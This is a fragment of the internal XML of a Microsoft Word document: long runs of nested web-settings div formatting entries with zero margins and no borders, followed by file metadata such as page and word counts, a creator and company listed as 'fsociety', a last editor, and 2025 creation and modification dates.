                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1514493698">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="306931845">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1190800467">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="189418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7434699">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="474832063">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="222765229">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="28189115">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1751124442">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1163081544">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="740253791">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="797186978">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="34683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3405898">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1180895047">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1221163826">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1295406333">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1316760548">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1415316274">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="20838663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ict.az/az/content/250"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41108-EB64-4A97-8E0A-740A7BAF5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25</Pages>
  <Words>6647</Words>
  <Characters>37890</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>315</Lines>
  <Paragraphs>88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fsociety</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>44449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fsociety</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ниджат</cp:lastModifiedBy>
  <cp:revision>102</cp:revision>
  <cp:lastPrinted>2022-09-20T11:43:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-13T20:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-03T21:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>